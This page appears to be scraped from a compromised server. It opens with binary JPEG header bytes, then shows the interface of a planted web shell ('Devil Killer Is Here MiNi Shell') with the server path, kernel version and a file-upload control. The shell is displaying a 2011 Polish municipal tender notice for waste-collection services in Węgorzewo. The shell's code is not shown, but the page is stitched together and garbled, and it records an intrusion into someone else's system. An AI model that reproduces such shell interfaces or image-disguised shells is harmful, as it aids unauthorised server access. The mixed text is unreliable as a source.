JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110210/49411-N-2011.html

<p class="kh_header"><b>Węgorzewo: Kompleksowa obsługa Gminy Węgorzewo w zakresie świadczenia usług związanych z odpadami.</b><br>
<b>Numer ogłoszenia: 49411 - 2011; data zamieszczenia: 10.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgorzewo , ul. Zamkowa 3, 11-600 Węgorzewo, woj. warmińsko-mazurskie, tel. 87 4275400, faks 87 4275401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegorzewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa Gminy Węgorzewo w zakresie świadczenia usług związanych z odpadami..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest, Kompleksowa obsługa Gminy Węgorzewo 
w zakresie świadczenia usług związanych z odpadami, na terenie gminy, zgodnie 
z niżej opisanym zakresem dla poszczególnych usług, który obejmuje:
1.1. Zorganizowanie Akcji Posesja -miasto, polegającej na podstawieniu zgodnie 
z harmonogramem realizacji zadania odkrytych kontenerów o pojemności 7 - 10 m3 w szacunkowej ilości 8 sztuk w wybranym rejonie miasta i po ich zapełnieniu wywiezienie odpadów na składowisko wskazane w zezwoleniu na prowadzenie działalności polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości. Po opróżnieniu kontenery należy podstawić w następnym rejonie miasta i tak kolejno, aż do zrealizowania uzgodnionego harmonogramu      wywozowego. Niezależnie od przyjętego harmonogramu należy także realizować doraźne zlecenia Zamawiającego dotyczące wywozu odpadów w ramach prowadzonej akcji. Realizacja zamówienia w okresie marzec - kwiecień. Zamówienie obejmuje teren całego miasta tj. wszystkie ulice w granicach administracyjnych miasta. Szacunkowa ilość odpadów około 1 000 m3. 
1.2. Zorganizowanie /Akcji Posesja/- wieś, polegającej na podstawieniu zgodnie 
z harmonogramem realizacji zadania, odkrytych kontenerów o pojemności 7 - 10 m3 w szacunkowej ilości po 2 sztuki w poszczególnych miejscowościach Gminy Węgorzewo i po ich zapełnieniu wywiezienie odpadów na składowisko wskazane w zezwoleniu na prowadzenie działalności polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości. 
Po opróżnieniu kontenery należy podstawić w następnych miejscowościach i tak kolejno,aż do zrealizowania harmonogramu wywozowego. Niezależnie od przyjętego harmonogramu należy także realizować doraźne zlecenia Zamawiającego dotyczące wywozu odpadów w ramach prowadzonej akcji. Realizacja zamówienia w okresie kwiecień - maj. Zamówienia obejmuje teren całej Gminy zgodnie z wykazem i harmonogramem dostarczonym przez Zamawiającego.
Szacunkowa ilość odpadów około 250 m3 . Szacunkowa ilość kilometrów do pokonania w związku z realizacją  tej części zamówienia ok. 1500 km. Za zabezpieczenie odpadów przed ich wydostaniem się na zewnątrz podczas zapełniania pojemnika/kontenera i czystość drogi przewozu odpowiada Wykonawca.
1.3. Wywóz odpadów powstałych w wyniku sprzątania ulic, placów, terenów zielonych itp.z użyciem odkrytych kontenerów o pojemności 7 - 10 m3. Usługa wykonywana od miesiąca marca do listopada włącznie polegająca na podstawieniu 1 kontenera we wskazane miejsce przez Zamawiającego i wywozie odpadów na składowisko wskazane w zezwoleniu na prowadzenie działalności polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości . 
Usługa wykonywana doraźnie, według potrzeb Zamawiającego. Zamówienie obejmuje teren zarówno miasta jak i Gminy zgodnie ze zleceniem Zamawiającego. 
Szacunkowa ilość odpadów około 600 m3 .
1.4. Podstawianie kontenerów   o pojemności 7 - 10 m3 oraz o pojemności 2.2 m3 we wskazane miejsce przez Zamawiającego i sukcesywny (nie dopuszczające do przepełnienia kontenerów)wywóz odpadów na składowisko wskazane w zezwoleniu na prowadzenie działalności polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości w okresie turystycznym, tj. w okresie od czerwca do września włącznie. Miejsca te to m. in. Kal, Ogonki, Przystań, i inne miejscowości wskazane przez Zamawiającego. Szacunkowa ilość odpadów około 200 m 3.
Szacunkowa ilość kilometrów do pokonania w związku z realizacją  tej części zamówienia około 1 400 km.  Za zabezpieczenie odpadów przed ich wydostaniem się na zewnątrz podczas zapełniania pojemnika/kontenera i czystość drogi przewozu odpowiada Wykonawca.
1.5. Zorganizowanie i obsługa systemu selektywnej zbiórki odpadów z terenu Gminy Węgorzewo
    polegającego na sukcesywnym opróżnieniu pojemników i kontenerów (nie dopuszczając do 
    przepełnienia) o pojemności od 1100 l. do 1800 l. oraz typu POK-11 o pojemność 2.2 m3 będących
    w posiadaniu Zamawiającego i po odpowiednim przygotowaniu odpadów przekazanie ich 
     uprawnionemu recyklerowi. Zamawiający posiada na terenie miasta Węgorzewo 65 pojemników do
    zbiórki odpadów plastikowych, 10 pojemników na szkło i 6 pojemników na makulaturę oraz 36 
    pojemników do zbiórki opakowań plastikowych na terenie wiejskim. Szacunkowa ilość pojemników 
    do opróżniania około 3 100 szt. z terenu miasta i 450 szt. z terenu wsi. Szacunkowa ilość 
    kilometrów do pokonania w związku z realizacją  tej części zamówienia 2 400km.
    Za zabezpieczenie odpadów przed ich wydostaniem się na zewnątrz podczas zapełniania
    pojemnika/kontenera i czystość drogi przewozu odpowiada Wykonawca.
1.6. Zorganizowanie i obsługa w Węgorzewie stacjonarnego punktu przyjmowania odpadów   
      branży AGD, elektrycznej i elektronicznej od mieszkańców Gminy, czynnego w dni robocze od 
     godziny 10 00 do godziny 18 00, a w pozostałe dni, po wcześniejszym uzgodnieniu telefonicznym.  Zebrane odpady należy przekazywać sukcesywnie uprawnionemu recyklerowi do 31.12.2011 roku.

1.7. Usuwanie odpadów komunalnych z koszy ulicznych w ilości 230 sztuk na terenie miasta
        Węgorzewa. Opróżnianie koszy ulicznych w miesiącach październik - kwiecień (włącznie) 2 razy
        w tygodniu, w miesiącach maj - wrzesień (włącznie) 3 razy w tygodniu za wyjątkiem ulic: J.Bema,
       Zamkowa, Pl.Wolności,  Pl.Grunwaldzki, parking przy Szkole Podstawowej Nr 2, nad kanałem 
       Węgorzewskim, które w miesiącach lipiec - sierpień mają być opróżniane codziennie. Ponadto
      Wykonawca będzie zobowiązany przez cały okres obowiązywania umowy, raz na dwa tygodnie
       opróżniać kosze ustawione na przystankach autobusowych na terenach wiejskich gminy we
       wsiach: ogonki, Kol.Rybacka, Perły, Rudziszki, Biedaszki, Wesołowo, Czerwony Dwór, Stawki,
       Trygort. Utrzymanie porządku wokół kosza w promieniu 1,0 m. Transport odpadów na 
        składowisko wskazane w zezwoleniu na prowadzenie działalności polegającej na odbiorze 
       odpadów komunalnych od właścicieli nieruchomości. Za zabezpieczenie odpadów podczas 
       wysypywania koszy oraz czystość drogi przewozu odpowiada Wykonawca. 
2. Powyższe zakresy usług są jedynie ilościami szacunkowymi określonymi dla potrzeb
    przeprowadzenia niniejszego postępowania. Zamawiający dopuszcza możliwość zlecenia
    mniejszej ilości poszczególnych usług, w takim przypadku nastąpi obniżenie wynagrodzenia
   Wykonawcy o procentową wartość niewykonanych usług lub zwiększenia ilości w ramach zamówień 
    uzupełniających w zależności od  bieżących potrzeb. 
3. Przewidywane ilości poszczególnych usług będących przedmiotem niniejszego  zamówienia nie 
    mogą stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, co do ilości faktycznie 
    zamówionych przez Zamawiającego usług w toku realizacji umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające do wysokości 50% wartości zamówienia podstawowego - art. 67 ust.1 pkt 6/.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-5, 90.51.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium zgodnie z art. 45 ust. 4 i 5a ustawy w wysokości: - 8 000,00 PLN / słownie złotych: osiem tysięcy/.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą spełnia / nie spełnia w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu z uwzględnieniem przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na podstawie art. 89 ust.1 pkt 5 ustawy. Zamawiający uzna spełnienie powyższego warunku, jeżeli wykonawcy wykażą że: posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,  tzn. a/ zezwolenie na prowadzenie działalności określonej w art. 28 Ustawy o odpadach-(tekst  jedn. Dz.U.2010 Nr 185,poz.1243) t.j. zbieranie lub transport odpadów, b/. zezwolenie na prowadzenie działalności określonej w art. 7, ust. 1 pkt 1 ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach - (tekst jednolity Dz.U.2005r.Nr
236,poz.2008), w zakresie odbierania odpadów od właścicieli nieruchomości,
c/  wpis do rejestru GIOŚ w rozumieniu Ustawy z dnia 29 lipca 2005 r.o zużytym sprzęcie elektrycznym i elektronicznym ( Dz.U. Nr 180, poz. 1495)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez
          wykonawcę w celu potwierdzenia warunków udziału w postępowaniu z uwzględnieniem
          przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem
          Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na
         podstawie art. 89 ust. 1 pkt 5 ustawy. Zamawiający wymaga, aby Wykonawca wykazał, że 
         w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest
         krótszy - w tym okresie zrealizował co najmniej jedną usługę w zakresie usług będących 
         przedmiotem zamówienia o wartości min. brutto 150 000 zł. (słownie: sto pięćdziesiąt tysięcy 
       zł.00/100), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, poparte dokumentem
        potwierdzającym, że usługi zostały wykonane lub są wykonywane należycie /np.referencje/. 
        Wykonawcy mogą polegać na wiedzy i doświadczeniu innych podmiotów niezależnie od 
        charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez
          wykonawcę w celu potwierdzenia warunków udziału w postępowaniu z uwzględnieniem
          przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem
          Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na
          podstawie art. 89 ust. 1 pkt 5 ustawy. Zamawiający uzna spełnienie powyższego warunku, jeżeli 
          wykonawcy wykażą, że dysponują odpowiednim potencjałem technicznym niezbędnym do 
         realizacji zamówienia wraz z informacją o podstawie dysponowania, co najmniej: 
         a) pomieszczeniem/ wiatą do zbioru zużytego sprzętu elektrycznego i elektronicznego,
         b) minimum 1 pojazdem do opróżniania pojemników o pojemności 2,2 m3 , oraz od 1100 l do
             1800 l ,
         c) minimum 1 pojazdem do opróżniania i przemieszczania pojemników o pojemności 7 - 10 m3, 
         d) minimum 1 pojazdem do opróżniania koszy ulicznych na śmieci z obsługą,
         e) minimum 10 kontenerów o pojemności 7 - 10 m3,  odkrytych,
         f) minimum 7 pojemników na odpady o pojemności 2,2 m3 lub podobnego typu.
         Wykonawcy mogą polegać na potencjale technicznym innych podmiotów niezależnie od
         charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą 
           spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu 
           potwierdzenia warunków udziału w postępowaniu z uwzględnieniem przepisów art. 26 ust.3 
           ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z 
           postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na podstawie art. 89 ust. 
           1 pkt 5 ustawy. Wykonawcy mogą polegać na osobach zdolnych do wykonania zamówienia
           niezależnie od charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą 
           spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu
           potwierdzenia warunków udziału w postępowaniu z uwzględnieniem przepisów art. 26 ust.3 
          ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem Wykonawcy z 
          postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na podstawie art. 89 ust.
          1 pkt 5 ustawy. Zamawiający uzna spełnienie powyższego warunku, jeżeli Wykonawca wykaże,
         że, jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
          związanej z przedmiotem zamówienia  na kwotę minimum 150 000 PLN.
          Wykonawcy mogą polegać na zdolnościach finansowych innych podmiotów niezależnie od
          charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku gdy wykonawca polega na zasobach niezbędnych do wykonania zamówienia
         innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi 
         zasobami, w szczególności przedstawi pisemne zobowiązanie tych podmiotów do dyspozycji
         niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli 
         z uzasadnionej przyczyny wykonawcy nie mogą przedstawić dokumentów dotyczących sytuacji 
         finansowej i ekonomicznej wymaganych przez Zamawiającego, mogą przedstawić inny 
        dokument, który w wystarczający sposób potwierdza spełnienie warunku o, którym mowa 
         w pkt 4.1.b/.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień zawartej umowy może nastąpić za zgodą obu stron, wyrażoną na piśmie pod rygorem nieważności. Zamawiający przewiduje wprowadzenie następujących zmian 
w umowie:
1. Terminy wykonania usług objętych niniejszą umową mogą ulec zmianie w przypadku:
    a) przerwy w realizacji poszczególnych zakresów usług powstałych na skutek przyczyn 
         niezależnych od Wykonawcy i Zamawiającego w szczególności; opady śniegu, nieprzejezdne
        drogi, wichury i inne wypadki losowe i.t.p., 
    b) wstrzymania poszczególnych zakresów usług przez Zamawiającego albo przerw w wykonaniu
         tych usług powstałych z winy Zamawiającego a spowodowanych okolicznościami, których nie
         mógł przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie i realizację usług.
 2. Dopuszcza się możliwość zmiany postanowień niniejszej umowy w przypadku :
     a) dokładniejszego doprecyzowania zapisów umowy,
      b) wprowadzenia zmian korzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gmina.wegorzewo.sisco.info/?przetargi=1<br>
